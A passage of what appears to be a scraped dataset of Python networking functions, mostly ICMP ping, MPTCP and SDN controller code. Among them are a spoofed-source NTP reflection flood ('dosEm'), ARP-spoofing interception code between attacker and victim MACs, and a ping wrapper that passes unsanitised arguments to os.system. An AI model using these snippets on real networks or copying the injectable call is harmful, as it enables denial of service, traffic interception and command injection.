ip.saddr, ip.ttl, ip.protocol, icmp.type, icmp.code)\n )\n s.send(msg)", "def spoof_packet(packet):", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def process_mptcp_pkt_from_server(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n flow_id = acks[daddr, dport, saddr, sport][co.FLOW_ID]\n if conn_acks[conn_id][co.C2S] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.C2S]) % max_val\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_S2C] and (dss - conn_acks[conn_id][co.S2C]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.S2C][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission!\n mptcp_connections[conn_id].attr[co.S2C][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_S2C][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]))\n conn_acks[conn_id][HSEQ_S2C][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_S2C].add(dss)\n conn_acks[conn_id][HSEQ_S2C][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]]\n\n conn_acks[conn_id][co.C2S] = dack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][SERVER] = ts_delta", "def ping(cmd, *args, **argv):\n import os\n context = argv[\"context\"]\n \n def count(num):\n if str(num) == str(int(num)):\n if num < 0:\n context.write(\"%s: bad number of packets to transmit.\" % 
cmd)\n else:\n return num\n else:\n context.write(\"%s: can't set unicast time-to-live: Unknown host\" % cmd)\n return\n\n ping_p = {\"-c\":count}\n\n def isipaddress(ip):\n import socket\n try:\n ipa = socket.gethostbyname(ip)\n return ipa\n except:\n context.write(\"ping: unknown host %s\" % ip)\n return None\n\n def doping(cmd, sign, sign_param, ipaddress):\n if sign in ping_p.keys():\n # #\n pass\n else:\n context.write(\"connect: Unknown host\")\n return \n \n\tif ping_p[sign](sign_param):\n # #\n pass\n else:\n return \n if isipaddress(ipaddress):\n ip = isipaddress(ipaddress)\n else:\n return\n try:\n os.system(str(cmd) + \" \" + str(sign) + \" \" + str(sign_param) + \" \" + str(ip))\n except:\n context.write(\"has some errors in ping command\")\n return \n\n length = len(args)\n \n if length == 0:\n helpinfo = context.resolver.get_func_doc(getattr(context.resolver.get_module(cmd), cmd))\n helpinfo_format = helpinfo[\"format\"].rstrip()\n helpinfo_format = helpinfo_format.lstrip()\n if helpinfo_format == \"\":\n return\n context.write(helpinfo_format)\n\n elif length < 3:\n cmd_real = context.resolver.has_command(args[0], cmd)\n if cmd_real != None:\n cmds = cmd.split()\n cmd_n = \"_\".join(cmds)\n modulename = cmd_n + \"_\" + cmd_real\n module = context.resolver.get_module(modulename)\n func = getattr(module, modulename)\n func(cmd + \" \" + cmd_real, context = context)\n else:\n doping(cmd, \"-c\", 4, args[0])\n\n else:\n\tif args[1] == \"0\":\n\t os.system(str(cmd) + \" \" + str(args[2]))\n\telse:\n doping(cmd, args[0], args[1], args[2])", "def process_mptcp_pkt_from_client(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n flow_id = acks[saddr, sport, daddr, dport][co.FLOW_ID]\n if conn_acks[conn_id][co.S2C] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.S2C]) % max_val\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_C2S] and (dss - conn_acks[conn_id][co.C2S]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.C2S][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission! 
(take into account the seq overflow)\n mptcp_connections[conn_id].attr[co.C2S][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_C2S][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]))\n conn_acks[conn_id][HSEQ_C2S][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_C2S].add(dss)\n conn_acks[conn_id][HSEQ_C2S][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]]\n\n conn_acks[conn_id][co.S2C] = dack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][CLIENT] = ts_delta", "def validate_ping(result):\n if '0 packets received' in str(result) or 'no answer from' in str(result) or '0 received' in str(result):\n print 'Conectividade - DOWN'\n return False\n print 'Conectividade - OK'\n return True", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. 
and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next 
measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. 
Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + 
str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def send_error(self, conn, msg):\n #print(\"THIS IS CONNNNNNNNNNNNNNNNNNNN\", conn.getsockname(), conn.getpeername()) \n usIP = conn.getpeername()[:-1] + \"1\" \n #print(usIP) \n no_route = {\"src\": usIP, \"dst\": msg[\"src\"], \"type\": \"no route\", \"msg\": {}}\n conn.send(json.dumps(no_route).encode(\"ascii\"))\n return", "def send_one_ping(my_socket, dest_addr, id):\n dest_addr = socket.gethostbyname(dest_addr)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n my_checksum = 0\n\n # Make a dummy heder with a 0 checksum.\n header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, my_checksum, id, 1)\n bytes_in_double = struct.calcsize(\"d\")\n data = (192 - bytes_in_double) * \"Q\"\n data = struct.pack(\"d\", time.time()) + data\n\n # Calculate the checksum on the data and the dummy header.\n my_checksum = checksum(header + data)\n\n # Now that we have the right checksum, we put that in. 
It's just easier\n # to make up a new header than to stuff it into the dummy.\n header = struct.pack(\n \"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), id, 1\n )\n packet = header + data\n my_socket.sendto(packet, (dest_addr, 1)) # Don't know about the 1", "def dosEm(target, ntplist, data, currentserver):\n ntpserver = ntplist[currentserver] #LOAD THE SERVER\n packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #CONSTRUIRE LE PAQUER\n send(packet,loop=1) #ENVOYER ", "def scapy_create_send_ICMP_customized(self, ipdst, ipsrc, send1=True, \\\n macdst=None, macsrc=None):\n ip_header = self.define_ip_header(dst=ipdst, src=ipsrc,\\\n ttl=self.ipttl, version=self.version)\n icmp_header = self.define_icmp_header(version=self.version)\n if send1:\n if (macdst == None):\n send(ip_header/icmp_header, verbose=self.verbose)\n else:\n ether_header = self.define_ethernet_header(src=macsrc, \\\n dst=macdst)\n sendp(ether_header/ip_header/icmp_header, verbose=self.verbose, \\\n iface=self.sourceiface)\n return\n\n pktcount = self.pktcount\n # If user does not specify pktcount, need calculate it based on\n # duration and interval\n if (pktcount == 0):\n pktcount = int(self.duration*1000/self.interval)\n send(ip_header/icmp_header, count=pktcount, inter=self.interval/1000.0,\n verbose=self.verbose)", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def ttl2ip(ttl, dest):\n\n fib = [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233]\n ips = [[44, 38, 10, e] for e in fib]\n return ips[ttl - 2]", "def main():\n args = TrafficScriptArg(\n [u\"src_mac\", u\"dst_mac\", u\"src_ip\", u\"dst_ip\", u\"dscp\"]\n )\n\n rxq = RxQueue(args.get_arg(u\"rx_if\"))\n txq = TxQueue(args.get_arg(u\"tx_if\"))\n\n src_mac = args.get_arg(u\"src_mac\")\n dst_mac = args.get_arg(u\"dst_mac\")\n src_ip = args.get_arg(u\"src_ip\")\n dst_ip = args.get_arg(u\"dst_ip\")\n dscp = int(args.get_arg(u\"dscp\"))\n\n ip_layer = IPv6 if ip_address(src_ip).version == 6 else IP\n\n sent_packets = list()\n pkt_send = (Ether(src=src_mac, dst=dst_mac) /\n ip_layer(src=src_ip, dst=dst_ip) /\n TCP())\n\n pkt_send /= Raw()\n sent_packets.append(pkt_send)\n txq.send(pkt_send)\n\n while True:\n pkt_recv = rxq.recv(2, sent_packets)\n if pkt_recv is None:\n raise RuntimeError(u\"ICMPv6 echo reply Rx timeout\")\n\n if pkt_recv.haslayer(ICMPv6ND_NS):\n # read another packet in the queue if the current one is ICMPv6ND_NS\n continue\n elif pkt_recv.haslayer(ICMPv6MLReport2):\n # read another packet in the queue if the current one is\n # ICMPv6MLReport2\n continue\n elif pkt_recv.haslayer(ICMPv6ND_RA):\n # read another packet in the queue if the current one is\n # ICMPv6ND_RA\n continue\n\n # otherwise process the current packet\n break\n\n if pkt_recv is None:\n raise RuntimeError(u\"Rx timeout\")\n\n if ip_layer == IP:\n check_ipv4(pkt_recv, dscp)\n else:\n check_ipv6(pkt_recv, 
dscp)\n\n sys.exit(0)", "def _send(self,msg):\n attempts = 3\n while attempts > 0:\n self.sock.sendto(msg, self.ip_port)\n ready = select.select([self.sock], [], [], self.timeout)\n if ready[0]:\n data, ip_port = self.sock.recvfrom(60)\n if ip_port != self.ip_port: continue\n return decode(data)\n attempts -= 1\n print(\"Retrying send\")\n return None", "def forward(p):\n try:\n if IP in p and p[IP].dst == RD_ADRRESS and p[Ether].src != GW_MAC_ADRRESS and p[Ether].dst == GW_MAC_ADRRESS:\n if p[IP].src not in black_list:\n send(p[1::], iface=IFACE, verbose=0)\n except:\n print(\"error in forward\")\n finally:\n sys.exit()", "def query_sniff(pkt):\n if IP in pkt:\n ip_src = pkt[IP].src\n ip_dst = pkt[IP].dst\n\n if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:\n domain = pkt.getlayer(DNS).qd.qname.decode(\"utf-8\")\n now = datetime.now()\n stored_dns_requests.update({datetime.timestamp(now): domain})\n print(\"SRC: {} - DST: {} : {}\".format(ip_src, ip_dst, domain))", "def host_ping(self, src_host, dst_ip, intf=None):\n self.one_ipv4_ping(\n src_host, dst_ip, require_host_learned=False, retries=5, timeout=1000, intf=intf)", "def test_udp_bad_server():\n assert dnsck_query(\"8.8.8.88\", \"google.com\", \"A\", 1) == 1", "def do(self):\n from sys import exc_info\n try: # One could use UDP here, but it's obscure\n current_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname(\"icmp\"))\n except socket.error, (errno, msg):\n if errno == 1:\n # Operation not permitted - Add more information to traceback\n etype, evalue, etb = exc_info()\n evalue = etype(\n \"%s - Note that ICMP messages can only be send from processes running as root.\" % evalue\n )\n raise etype, evalue, etb\n raise # raise the original error\n self.seq_number += 1\n send_time = self.send_one_ping(current_socket)\n if send_time == None:\n return\n\n receive_time, packet_size, ip, ip_header, icmp_header = self.receive_one_ping(current_socket)\n current_socket.close()\n\n if receive_time:\n return (receive_time - send_time) * 1000.0", "def receive_ping(my_socket, timeout):\n start_time = timeout\n while True:\n start_select = time.process_time()\n # select.select(rlist, wlist, xlist[, timeout])\n # wait until ready for read / write / exceptional condition\n # The return value is a triple of lists\n what_ready = select.select([my_socket], [], [], start_time)\n how_long = (time.process_time() - start_select)\n if what_ready[0] == []: #timeout\n return\n\n time_received = time.process_time()\n # socket.recvfrom(bufsize[, flags])\n # The return value is a pair (string, address)\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20 : 28]\n icmp_buff= rec_packet[28 : ]\n ip_type, code, checksum, packet_ID, sequence = struct.unpack(\"bbHHh\", icmp_header)\n #if ip_type != 8 and packet_ID == ID: # ip_type should be 0\n if ip_type != 8: # ip_type should be 0\n byte_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28 : 28 + byte_in_double])[0]\n return time_received - time_sent\n else:\n print('Got icmp:')\n print(icmp_buff)\n return timeout\n start_time = start_time - how_long\n if start_time <= 0:\n return", "def ping(self,dest):\n\t\tself.tn.write('ping -c 4 %s\\n'%(dest))\n\t\tself.tn.write('exit\\n')\n\t\tresp = self.tn.read_all()\n\t\treturn resp", "def tcpdump(timeout, q, interface):\t\n\tlogging.debug('tcpdump -s 1024 -lqnAt tcp port 80 -i eth0')\n\t# tcpdump -s 1024 -lqnAt tcp port 80\n\t\t\n\tcommand = Command(['/usr/sbin/tcpdump', '-s 1024', '-lnAq', 
'-i', interface], timeout)\n\tcommand.run()\n\n\t# when it's executing here, the results have been available\n\t# print command.out\n\n\tif command.out is not None:\n\t\t# pattern = \"time=([0-9]+\\.[0-9]+) ms\"\n\t\tip_pattern = \"IP ([0-9]+.[0-9]+.[0-9]+.[0-9]+).[0-9]+ > [0-9]+.[0-9]+.[0-9]+.[0-9]+.[0-9]\"\n\t\tgoogle_pattern = \"domain=.google.com\"\n\t\tlines = command.out.split('\\n')\n\t\tlast_ip = None\n\n\t\t# first time scan for google's return ip\n\t\tfor line in lines:\n\t\t\tip_src = re.search(ip_pattern, line)\n\t\t\tif ip_src is not None:\n\t\t\t\tlast_ip = ip_src.group(1)\n\t\t\tif re.search(google_pattern, line):\n\t\t\t\tprint last_ip\n\t\t\t\tbreak\n\n\t\tgEntries = []\n\t\tif last_ip is not None:\n\t\t\t\n\t\t\t# second time scan parse tcpdump for query entries\n\t\t\tfor line in lines:\n\t\t\t\tlast_ip_pos = re.search(last_ip, line)\n\t\t\t\tif last_ip_pos is None:\n\t\t\t\t\tcontinue\n\t\t\t\n\t\t\t\tif line.index('>') > last_ip_pos.start():\n\t\t\t\t\t# from remote to this place\n\t\t\t\t\ttraffic_type = 1\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# out to remote\n\t\t\t\t\ttraffic_type = 0\n\t\t\t\n\t\t\t\ttime_pattern = \"([0-9]+:[0-9]+:[0-9]+.[0-9]+) IP\"\n\t\t\t\ttimestamp = re.search(time_pattern, line)\n\t\t\t\tif timestamp is not None:\n\t\t\t\t\ttime_str = 